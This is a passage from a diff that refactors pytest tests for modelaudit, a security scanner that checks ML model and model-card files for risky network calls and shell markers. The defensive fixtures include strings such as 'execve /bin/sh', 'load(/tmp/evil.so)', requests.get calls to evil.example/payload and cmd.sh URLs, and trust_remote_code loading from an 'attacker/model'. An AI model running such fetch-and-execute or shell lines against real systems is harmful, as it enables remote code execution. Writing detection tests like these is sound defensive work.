/bin/sh\nexecvpe /bin/sh\nEVAL payload\n") - - result = TensorRTScanner().scan(str(path)) - - assert result.success is False - matched_patterns = {issue.details.get("pattern") for issue in result.issues} - assert {"exec", "eval"}.issubset(matched_patterns) + _assert_tensorrt_markers(path, b"execve /bin/sh\nexecvp /bin/sh\nexecvpe /bin/sh\nEVAL payload\n", "exec", "eval") def test_tensorrt_scanner_detects_tmp_tokens_after_colon_and_windows_drive_prefix(tmp_path: Path) -> None: @@ -354,31 +342,38 @@ def test_tensorrt_scanner_detects_tmp_tokens_after_colon_and_windows_drive_prefi def test_tensorrt_scanner_detects_tmp_tokens_after_punctuation_delimiters(tmp_path: Path) -> None: path = tmp_path / "punctuated_tmp.engine" - path.write_bytes(b"load(/tmp/evil.so)\ncmd;/tmp/payload\nload(/tmp/libc.so.6)\n") - - result = TensorRTScanner().scan(str(path)) - - assert result.success is False - matched_patterns = {issue.details.get("pattern") for issue in result.issues} - assert "/tmp/" in matched_patterns - assert ".so" in matched_patterns + _assert_tensorrt_patterns(path, b"load(/tmp/evil.so)\ncmd;/tmp/payload\nload(/tmp/libc.so.6)\n", "/tmp/") def test_tensorrt_scanner_detects_standalone_three_byte_markers(tmp_path: Path) -> None: path = tmp_path / "standalone_markers.engine" - path.write_bytes(b"\x00../\x00.so\x00") + _assert_tensorrt_patterns(path, b"\x00../\x00.so\x00", "../") + + +def test_tensorrt_scanner_safe_file(tmp_path: Path) -> None: + path = tmp_path / "safe.engine" + path.write_bytes(b"binarydata") + result = TensorRTScanner().scan(str(path)) + assert result.success + assert not result.issues + + +def _assert_tensorrt_patterns(path: Path, payload: bytes, pattern: str) -> None: + path.write_bytes(payload) result = TensorRTScanner().scan(str(path)) assert result.success is False matched_patterns = {issue.details.get("pattern") for issue in result.issues} - assert "../" in matched_patterns + assert pattern in matched_patterns assert ".so" in matched_patterns -def test_tensorrt_scanner_safe_file(tmp_path: Path) -> None: - path = tmp_path / "safe.engine" - path.write_bytes(b"binarydata") +def _assert_tensorrt_markers(path: Path, payload: bytes, first_marker: str, second_marker: str) -> None: + path.write_bytes(payload) + result = TensorRTScanner().scan(str(path)) - assert result.success - assert not result.issues + + assert result.success is False + matched_patterns = {issue.details.get("pattern") for issue in result.issues} + assert {first_marker, second_marker}.issubset(matched_patterns) diff --git a/tests/scanners/test_text_scanner.py b/tests/scanners/test_text_scanner.py index ca9eb1709..750efdf8c 100644 --- a/tests/scanners/test_text_scanner.py +++ b/tests/scanners/test_text_scanner.py @@ -13,7 +13,7 @@ from modelaudit.detectors import network_comm from modelaudit.scanner_results import SCAN_OUTCOME_MESSAGE_METADATA_KEY from modelaudit.scanners import text_scanner as text_scanner_module -from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity +from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity, ScanResult from modelaudit.scanners.text_scanner import ( MAX_TEXT_FINDING_CONTEXT_BYTES, MAX_TOKENIZER_VOCABULARY_CC_RETARGET_OCCURRENCES, @@ -813,9 +813,7 @@ def test_text_scanner_documentation_image_trust_boundary_bypasses_stay_actionabl example: str, ) -> None: path = tmp_path / "README.md" - path.write_text(example, encoding="utf-8") - - result = TextScanner().scan(str(path)) + result = _scan_text_content(path, example) aggregate = scan_model_directory_or_file(str(path), cache_enabled=False) assert result.success is False @@ -833,24 +831,12 @@ def test_text_scanner_documentation_image_trust_boundary_bypasses_stay_actionabl def test_urlopen_documentation_fence_validation_is_bounded( monkeypatch: pytest.MonkeyPatch, ) -> None: - original_validate = network_comm._is_official_readme_urlopen_image_example - validation_calls = 0 - - def track_validation(example: bytes) -> bool: - nonlocal validation_calls - validation_calls += 1 - return original_validate(example) - - monkeypatch.setattr( - network_comm, - "_is_official_readme_urlopen_image_example", - track_validation, - ) + validation_calls = _count_documentation_validations(monkeypatch) invalid_fence = b"```python\nurlopen(\n```\n" payload = invalid_fence * (network_comm._MAX_README_IMAGE_EXAMPLE_FENCES + 3) assert network_comm.official_readme_urlopen_image_example_spans(payload) == () - assert validation_calls == network_comm._MAX_README_IMAGE_EXAMPLE_FENCES + assert validation_calls[0] == network_comm._MAX_README_IMAGE_EXAMPLE_FENCES class _CountingSpans(list[tuple[int, int]]): @@ -878,19 +864,7 @@ def test_urlopen_documentation_token_span_checks_are_linear() -> None: def test_urlopen_documentation_spans_are_not_cached_across_scans( monkeypatch: pytest.MonkeyPatch, ) -> None: - original_validate = network_comm._is_official_readme_urlopen_image_example - validation_calls = 0 - - def track_validation(example: bytes) -> bool: - nonlocal validation_calls - validation_calls += 1 - return original_validate(example) - - monkeypatch.setattr( - network_comm, - "_is_official_readme_urlopen_image_example", - track_validation, - ) + validation_calls = _count_documentation_validations(monkeypatch) payload = HUGGINGFACE_DOCUMENTATION_IMAGE_EXAMPLE.encode() first_spans = network_comm.official_readme_urlopen_image_example_spans(payload) @@ -898,7 +872,7 @@ def track_validation(example: bytes) -> bool: assert first_spans assert second_spans == first_spans - assert validation_calls == 2 + assert validation_calls[0] == 2 @pytest.mark.parametrize( @@ -1142,9 +1116,7 @@ def test_text_scanner_documentation_image_example_does_not_weaken_non_markdown_f def test_text_scanner_handles_routable_vocabulary_file(tmp_path: Path) -> None: text_path = tmp_path / "vocab.txt" - text_path.write_text("token\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "token\n") assert result.success is True assert not result.issues @@ -1185,19 +1157,7 @@ def test_text_scanner_routes_extensionless_documentation_through_security_detect tmp_path: Path, filename: str, ) -> None: - text_path = tmp_path / filename - text_path.write_text('requests.get("https://evil.example/payload")\n', encoding="utf-8") - - result = scan_file(str(text_path), config={"cache_scan_results": False}) - - assert TextScanner.can_handle(str(text_path)) - assert result.scanner_name == "text" - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_function" - and check.severity == IssueSeverity.CRITICAL - for check in result.checks - ) + _assert_documentation_routed_to_text(tmp_path, filename) @pytest.mark.parametrize("filename", ["README.en.md", "model_card.en.md", "modelcard.fr.rst"]) @@ -1205,19 +1165,7 @@ def test_text_scanner_routes_localized_documentation_through_security_detectors( tmp_path: Path, filename: str, ) -> None: - text_path = tmp_path / filename - text_path.write_text('requests.get("https://evil.example/payload")\n', encoding="utf-8") - - result = scan_file(str(text_path), config={"cache_scan_results": False}) - - assert TextScanner.can_handle(str(text_path)) - assert result.scanner_name == "text" - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_function" - and check.severity == IssueSeverity.CRITICAL - for check in result.checks - ) + _assert_documentation_routed_to_text(tmp_path, filename) def test_text_scanner_tokenizer_readme_basic_links_not_basic_auth_secret(tmp_path: Path) -> None: @@ -1396,9 +1344,7 @@ def test_text_scanner_basic_auth_does_not_bind_far_away_token(tmp_path: Path) -> def test_text_scanner_url_userinfo_is_redacted_without_basic_auth_false_positive(tmp_path: Path) -> None: text_path = tmp_path / "README.md" - text_path.write_text('download = "https://user:pass@example.test/model.bin"\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, 'download = "https://user:pass@example.test/model.bin"\n') assert any( check.name == "Network Communication Detection" @@ -1520,9 +1466,7 @@ def test_text_scanner_does_not_claim_arbitrary_extensionless_text(tmp_path: Path def test_text_scanner_documentation_urls_are_informational(tmp_path: Path) -> None: text_path = tmp_path / "README.md" - text_path.write_text("Documentation: https://docs.example.com/model-card\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "Documentation: https://docs.example.com/model-card\n") network_issues = [ issue for issue in result.issues if issue.type == "text_check" and "detected" in issue.message.lower() @@ -1535,15 +1479,13 @@ def test_text_scanner_documentation_urls_are_informational(tmp_path: Path) -> No @pytest.mark.parametrize("filename", ["README.md", "README", "README.en.md", "README.markdown"]) def test_text_scanner_readme_official_sample_image_request_is_informational(tmp_path: Path, filename: str) -> None: text_path = tmp_path / filename - text_path.write_text( + result = _scan_text_content( + text_path, "# Example\n```python\nimport requests\n" "image_url = 'https://huggingface.co/spaces/org/demo/resolve/main/image.png'\n" "image = Image.open(requests.get(image_url, stream=True).raw)\n```\n", - encoding="utf-8", ) - result = TextScanner().scan(str(text_path)) - assert result.success is True assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) assert not any( @@ -1556,15 +1498,13 @@ def test_text_scanner_readme_official_sample_image_request_is_informational(tmp_ @pytest.mark.parametrize("filename", ["README.env", "readme.env", "README.ENV", "README.md.env"]) def test_text_scanner_readme_environment_files_preserve_network_findings(tmp_path: Path, filename: str) -> None: text_path = tmp_path / filename - text_path.write_text( + result = _scan_text_content( + text_path, "```python\nimport requests\n" "image_url = 'https://huggingface.co/spaces/org/demo/resolve/main/image.png'\n" "image = Image.open(requests.get(image_url, stream=True).raw)\n```\n", - encoding="utf-8", ) - result = TextScanner().scan(str(text_path)) - assert result.success is False failed_network_checks = { check.details.get("type") @@ -1576,15 +1516,13 @@ def test_text_scanner_readme_environment_files_preserve_network_findings(tmp_pat def test_text_scanner_readme_plain_http_sample_image_stays_actionable(tmp_path: Path) -> None: text_path = tmp_path / "README.md" - text_path.write_text( + result = _scan_text_content( + text_path, "```python\nimport requests\n" "image_url = 'http://huggingface.co/spaces/org/demo/resolve/main/image.png'\n" "requests.get(image_url, stream=True)\n```\n", - encoding="utf-8", ) - result = TextScanner().scan(str(text_path)) - assert result.success is False assert any( check.name == "Network Communication Detection" @@ -1596,16 +1534,14 @@ def test_text_scanner_readme_plain_http_sample_image_stays_actionable(tmp_path: def test_text_scanner_readme_remote_code_trust_stays_actionable(tmp_path: Path) -> None: text_path = tmp_path / "README.md" - text_path.write_text( + result = _scan_text_content( + text_path, "```python\nimport requests\nfrom transformers import AutoModel\n" "image_url = 'https://huggingface.co/spaces/org/demo/resolve/main/image.png'\n" "AutoModel.from_pretrained('attacker/model', trust_remote_code=1)\n" "requests.get(image_url, stream=True)\n```\n", - encoding="utf-8", ) - result = TextScanner().scan(str(text_path)) - assert result.success is False assert any( check.name == "Network Communication Detection" @@ -1713,9 +1649,7 @@ def test_text_scanner_documentation_package_version_near_matches_remain_actionab finding_type: str, ) -> None: text_path = tmp_path / filename - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, content) aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) assert any( @@ -1733,9 +1667,7 @@ def test_text_scanner_model_card_aliases_preserve_executable_network_findings( filename: str, ) -> None: text_path = tmp_path / filename - text_path.write_text('requests.get("https://evil.example/payload")\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, 'requests.get("https://evil.example/payload")\n') aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) assert TextScanner.can_handle(str(text_path)) @@ -1755,9 +1687,7 @@ def test_text_scanner_model_card_aliases_keep_documentation_urls_informational( filename: str, ) -> None: text_path = tmp_path / filename - text_path.write_text("Documentation: https://docs.example.com/model-card\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "Documentation: https://docs.example.com/model-card\n") aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) @@ -1811,9 +1741,7 @@ def test_text_scanner_model_card_evidence_column_counts_unicode_characters(tmp_p def test_text_scanner_model_card_cloud_url_preserves_higher_actionable_severity(tmp_path: Path) -> None: text_path = tmp_path / "model_card.md" - text_path.write_text('endpoint = "https://bucket.s3.amazonaws.com/cmd.sh"\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, 'endpoint = "https://bucket.s3.amazonaws.com/cmd.sh"\n') aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) network_checks = _failed_network_detection_checks(result) @@ -1834,17 +1762,7 @@ def test_text_scanner_model_card_cloud_url_preserves_higher_actionable_severity( def test_text_scanner_model_card_endpoint_label_markdown_link_stays_informational(tmp_path: Path) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text("Endpoint: [API docs](https://docs.example.com)\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert network_checks - assert all(check.severity == IssueSeverity.INFO for check in network_checks) - assert determine_exit_code(aggregate) == 0 + _assert_model_card_endpoint_informational(tmp_path, "Endpoint: [API docs](https://docs.example.com)\n") @pytest.mark.parametrize( @@ -1860,17 +1778,7 @@ def test_text_scanner_model_card_capitalized_bullet_label_markdown_links_stay_in tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert network_checks - assert all(check.severity == IssueSeverity.INFO for check in network_checks) - assert determine_exit_code(aggregate) == 0 + _assert_model_card_endpoint_informational(tmp_path, content) def test_text_scanner_markdown_link_context_prefix_remains_bounded() -> None: @@ -1934,29 +1842,12 @@ def test_text_scanner_model_card_unknown_xml_markdown_context_fails_closed( monkeypatch: pytest.MonkeyPatch, ) -> None: monkeypatch.setattr(text_scanner_module, "MAX_TEXT_TRUNCATED_XML_CONTEXT_BYTES", 64) - text_path = tmp_path / "model_card.md" - text_path.write_text( - 'download ' - "[here](https://evil.example/payload.sh)\n", - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("type") == "url_detected" - and check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in network_checks + _assert_model_card_payload_endpoint_actionable( + tmp_path, + 'download [here](https://evil.example/payload.sh)\n', ) - assert determine_exit_code(aggregate) == 1 @pytest.mark.parametrize("closing_tag", ["", ""]) @@ -1966,30 +1857,12 @@ def test_text_scanner_model_card_truncated_xml_closing_tag_markdown_context_fail closing_tag: str, ) -> None: monkeypatch.setattr(text_scanner_module, "MAX_TEXT_TRUNCATED_XML_CONTEXT_BYTES", 64) - text_path = tmp_path / "model_card.md" - text_path.write_text( + _assert_model_card_payload_endpoint_actionable( + tmp_path, '{closing_tag}download [here](https://evil.example/payload.sh)\n', - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("type") == "url_detected" - and check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in network_checks ) - assert determine_exit_code(aggregate) == 1 @pytest.mark.parametrize("closing_tag", ["", ""]) @@ -1999,37 +1872,17 @@ def test_text_scanner_model_card_truncated_xml_closing_tag_direct_url_context_fa closing_tag: str, ) -> None: monkeypatch.setattr(text_scanner_module, "MAX_TEXT_TRUNCATED_XML_CONTEXT_BYTES", 64) - text_path = tmp_path / "model_card.md" - text_path.write_text( + _assert_model_card_payload_endpoint_actionable( + tmp_path, '{closing_tag}download https://evil.example/payload.sh\n', - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("type") == "url_detected" - and check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in network_checks ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_model_card_direct_endpoint_url_remains_actionable(tmp_path: Path) -> None: text_path = tmp_path / "model_card.md" - text_path.write_text("endpoint: https://evil.example/payload\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "endpoint: https://evil.example/payload\n") aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) assert any( @@ -2053,47 +1906,13 @@ def test_text_scanner_model_card_top_level_list_object_endpoint_urls_remain_acti tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("type") == "url_detected" - and check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in network_checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_model_card_payload_endpoint_actionable(tmp_path, content) def test_text_scanner_model_card_namespaced_xml_endpoint_url_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text("https://evil.example/payload.sh\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("type") == "url_detected" - and check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in network_checks + _assert_model_card_payload_endpoint_actionable( + tmp_path, "https://evil.example/payload.sh\n" ) - assert determine_exit_code(aggregate) == 1 @pytest.mark.parametrize( @@ -2119,25 +1938,7 @@ def test_text_scanner_model_card_leading_text_namespaced_xml_endpoint_url_remain tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("type") == "url_detected" - and check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in network_checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_model_card_payload_endpoint_actionable(tmp_path, content) @pytest.mark.parametrize( @@ -2168,25 +1969,7 @@ def test_text_scanner_model_card_structured_endpoint_markdown_links_remain_actio tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("type") == "url_detected" - and check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in network_checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_model_card_payload_endpoint_actionable(tmp_path, content) @pytest.mark.parametrize( @@ -2216,25 +1999,7 @@ def test_text_scanner_model_card_leading_text_structured_endpoint_markdown_links tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("type") == "url_detected" - and check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in network_checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_model_card_payload_endpoint_actionable(tmp_path, content) @pytest.mark.parametrize( @@ -2255,17 +2020,7 @@ def test_text_scanner_model_card_closed_xml_endpoint_links_stay_informational( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert network_checks - assert all(check.severity == IssueSeverity.INFO for check in network_checks) - assert determine_exit_code(aggregate) == 0 + _assert_model_card_endpoint_informational(tmp_path, content) @pytest.mark.parametrize( @@ -2279,51 +2034,20 @@ def test_text_scanner_model_card_sibling_yaml_list_items_stay_informational( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert network_checks - assert all(check.severity == IssueSeverity.INFO for check in network_checks) - assert determine_exit_code(aggregate) == 0 + _assert_model_card_endpoint_informational(tmp_path, content) def test_text_scanner_model_card_namespaced_xml_endpoint_markdown_link_remains_actionable( tmp_path: Path, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - "[download](https://evil.example/payload.sh)\n", - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("type") == "url_detected" - and check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in network_checks + _assert_model_card_payload_endpoint_actionable( + tmp_path, "[download](https://evil.example/payload.sh)\n" ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_model_card_deduplicates_git_clone_url_evidence(tmp_path: Path) -> None: text_path = tmp_path / "model_card.md" - text_path.write_text("git clone https://evil.example/repo.git\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "git clone https://evil.example/repo.git\n") aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) network_checks = _failed_network_detection_checks(result) @@ -2345,9 +2069,7 @@ def test_text_scanner_model_card_deduplicates_git_clone_url_evidence(tmp_path: P def test_text_scanner_model_card_keeps_distinct_executable_indicators_separate(tmp_path: Path) -> None: text_path = tmp_path / "model_card.md" - text_path.write_text('requests.get("https://evil.example/payload")\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, 'requests.get("https://evil.example/payload")\n') aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) network_checks = _failed_network_detection_checks(result) @@ -2410,9 +2132,7 @@ def test_text_scanner_model_card_dedup_preserves_distinct_locations_urls_and_sev def test_text_scanner_model_card_dedup_keeps_suspicious_ports_separate(tmp_path: Path) -> None: text_path = tmp_path / "model_card.md" - text_path.write_text('endpoint = "https://evil.example:4444/cmd.sh"\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, 'endpoint = "https://evil.example:4444/cmd.sh"\n') aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) network_checks = _failed_network_detection_checks(result) @@ -2432,13 +2152,11 @@ def test_text_scanner_model_card_dedup_redacts_credentials_without_merging_locat tmp_path: Path, ) -> None: text_path = tmp_path / "model_card.md" - text_path.write_text( + result = _scan_text_content( + text_path, "git clone https://user:first-secret@evil.example/repo.git\n" "git clone https://user:second-secret@evil.example/repo.git\n", - encoding="utf-8", ) - - result = TextScanner().scan(str(text_path)) aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) serialized = json.dumps(aggregate.model_dump(mode="json"), sort_keys=True) @@ -2462,15 +2180,13 @@ def test_text_scanner_model_card_dedup_redacts_credentials_without_merging_locat def test_text_scanner_model_card_dedup_keeps_encoded_url_variants_distinct(tmp_path: Path) -> None: text_path = tmp_path / "model_card.md" - text_path.write_text( + result = _scan_text_content( + text_path, "Docs: https://evil.example/payload.sh\n" "Docs: https://evil.example/%70ayload.sh\n" "Docs: https://xn--exmple-cua.com/payload.sh\n", - encoding="utf-8", ) - result = TextScanner().scan(str(text_path)) - network_checks = [ check for check in _failed_network_detection_checks(result) @@ -2487,12 +2203,9 @@ def test_text_scanner_model_card_dedup_keeps_encoded_url_variants_distinct(tmp_p def test_text_scanner_model_card_dedup_keeps_encoded_nested_urls_distinct(tmp_path: Path) -> None: text_path = tmp_path / "model_card.md" - text_path.write_text( - 'endpoint = "https://bucket.s3.amazonaws.com/model.bin?next=https%3A%2F%2Fevil.example%2Fcmd.sh"\n', - encoding="utf-8", + result = _scan_text_content( + text_path, 'endpoint = "https://bucket.s3.amazonaws.com/model.bin?next=https%3A%2F%2Fevil.example%2Fcmd.sh"\n' ) - - result = TextScanner().scan(str(text_path)) aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) network_checks = [ @@ -2514,15 +2227,13 @@ def test_text_scanner_model_card_dedup_keeps_encoded_nested_urls_distinct(tmp_pa def test_text_scanner_model_card_dedup_keeps_code_block_controls_separate(tmp_path: Path) -> None: text_path = tmp_path / "model_card.md" - text_path.write_text( + result = _scan_text_content( + text_path, "```sh\n" "git clone https://evil.example/repo.git\n" "python -c 'import requests; requests.get(\"https://evil.example/cmd.sh\")'\n" "```\n", - encoding="utf-8", ) - - result = TextScanner().scan(str(text_path)) aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) network_checks = _failed_network_detection_checks(result) @@ -2541,118 +2252,31 @@ def test_text_scanner_model_card_dedup_keeps_code_block_controls_separate(tmp_pa def test_text_scanner_model_card_markdown_link_string_endpoint_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - 'endpoint = "[download](https://evil.example/payload.sh)"\n', - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - for check in network_checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_model_card_endpoint_evidence(tmp_path, ('endpoint = "[download](https://evil.example/payload.sh)"\n')) def test_text_scanner_model_card_markdown_link_return_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - 'def endpoint():\n return "[download](https://evil.example/payload.sh)"\n', - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - for check in network_checks + _assert_model_card_endpoint_evidence( + tmp_path, ('def endpoint():\n return "[download](https://evil.example/payload.sh)"\n') ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_model_card_parenthesized_markdown_link_return_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - 'def endpoint():\n return ("[download](https://evil.example/payload.sh)")\n', - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - for check in network_checks + _assert_model_card_endpoint_evidence( + tmp_path, ('def endpoint():\n return ("[download](https://evil.example/payload.sh)")\n') ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_model_card_multiline_markdown_link_return_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - 'def endpoint():\n return (\n "[download](https://evil.example/payload.sh)"\n )\n', - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - for check in network_checks + _assert_model_card_endpoint_evidence( + tmp_path, ('def endpoint():\n return (\n "[download](https://evil.example/payload.sh)"\n )\n') ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_model_card_wrapped_call_markdown_link_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - 'download(\n "[download](https://evil.example/payload.sh)"\n)\n', - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert any( - check.details.get("normalized_evidence") - == { - "kind": "url", - "value": "https://evil.example/payload.sh", - } - for check in network_checks + _assert_model_card_endpoint_evidence( + tmp_path, ('download(\n "[download](https://evil.example/payload.sh)"\n)\n') ) - assert determine_exit_code(aggregate) == 1 @pytest.mark.parametrize( @@ -2664,12 +2288,7 @@ def test_text_scanner_model_card_wrapped_call_markdown_link_remains_actionable(t ) def test_text_scanner_model_card_zero_indent_wrapped_call_url_remains_actionable(tmp_path: Path, content: str) -> None: text_path = tmp_path / "model_card.md" - text_path.write_text( - content, - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, content) aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) network_checks = _failed_network_detection_checks(result) @@ -2711,20 +2330,7 @@ def test_text_scanner_model_card_passive_download_near_match_urls_stay_informati tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "model_card.md" - text_path.write_text( - content, - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - network_checks = _failed_network_detection_checks(result) - - assert network_checks - assert all(check.severity == IssueSeverity.INFO for check in network_checks) - assert determine_exit_code(aggregate) == 0 + 